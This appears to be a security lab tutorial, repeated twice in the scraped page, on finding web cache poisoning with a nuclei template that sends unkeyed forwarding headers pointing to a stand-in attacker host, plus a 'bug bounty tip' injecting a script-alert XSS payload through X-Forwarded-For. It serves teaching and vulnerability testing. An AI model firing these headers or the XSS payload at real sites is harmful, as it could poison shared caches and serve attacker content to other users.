Cache Poisoning using Nuclei

Discovering cache poisoning vulnerabilities using nuclei.

HTTP Headers

In this lab, we are going to use nuclei tool for discovering cache poisoning vulnerabilities on web applications.

To do this, we need to use common unkeyed inputs headers such as:

X-Forwarded-Prefix: cache.my_evil_dns.com
X-Forwarded-Host: cache.my_evil_dns.com
X-Forwarded-For: cache.my_evil_dns.com
X-Originating-IP: cache.my_evil_dns.com
X-Remote-IP: cache.my_evil_dns.com
X-Remote-Addr: cache.my_evil_dns.com
X-Client-IP: cache.my_evil_dns.com

In detail, to trigger cache poisoning vulnerabilities we need two requests:

The first that causes the server to cache the poisoned response
The second will retrieve the poisoned response from the server-side.

Building the Nuclei template

To carry out this scenario, we can build our nuclei template as presented below.

id: cache-poisoning    

info:
  name: HTTP Cache Poisoning
  author: sirpedrotavares / seguranca-informatica.pt
  severity: medium

requests:
  - raw:
      - |
        GET /?evil=007 HTTP/1.1
        X-Forwarded-Prefix: cache.my.evil.dns.com
        X-Forwarded-Host: cache.my.evil.dns.com
        X-Forwarded-For: cache.my.evil.dns.com
        X-Originating-IP: cache.my.evil.dns.com
        X-Remote-IP: cache.my.evil.dns.com
        X-Remote-Addr: cache.my.evil.dns.com
        X-Client-IP: cache.my.evil.dns.com

      - |
        GET /?evil=007 HTTP/1.1

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.my.evil.dns.com") == true'

.\nuclei.exe -u target_url -t .\nuclei-templates-master\sirpedrotavares\cache-poisoning.yaml

Bug Bounty tip

X-Forwarded-For: cache.my_evil_dns.com"></script><script>alert(document.domain);</script>

References

PreviousFormat String Exploitation NextInitial Foothold

Last updated 4 years ago

Was this helpful?

HTTP Headers

In this lab, we are going to use nuclei tool for discovering cache poisoning vulnerabilities on web applications.

To do this, we need to use common unkeyed inputs headers such as:

X-Forwarded-Prefix: cache.my_evil_dns.com
X-Forwarded-Host: cache.my_evil_dns.com
X-Forwarded-For: cache.my_evil_dns.com
X-Originating-IP: cache.my_evil_dns.com
X-Remote-IP: cache.my_evil_dns.com
X-Remote-Addr: cache.my_evil_dns.com
X-Client-IP: cache.my_evil_dns.com

In detail, to trigger cache poisoning vulnerabilities we need two requests:

The first that causes the server to cache the poisoned response

The second will retrieve the poisoned response from the server-side.

Building the Nuclei template

To carry out this scenario, we can build our nuclei template as presented below.

id: cache-poisoning    

info:
  name: HTTP Cache Poisoning
  author: sirpedrotavares / seguranca-informatica.pt
  severity: medium

requests:
  - raw:
      - |
        GET /?evil=007 HTTP/1.1
        X-Forwarded-Prefix: cache.my.evil.dns.com
        X-Forwarded-Host: cache.my.evil.dns.com
        X-Forwarded-For: cache.my.evil.dns.com
        X-Originating-IP: cache.my.evil.dns.com
        X-Remote-IP: cache.my.evil.dns.com
        X-Remote-Addr: cache.my.evil.dns.com
        X-Client-IP: cache.my.evil.dns.com

      - |
        GET /?evil=007 HTTP/1.1

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.my.evil.dns.com") == true'

We can test this template using the PortSwigger Lab .

.\nuclei.exe -u target_url -t .\nuclei-templates-master\sirpedrotavares\cache-poisoning.yaml

And yeah, we got it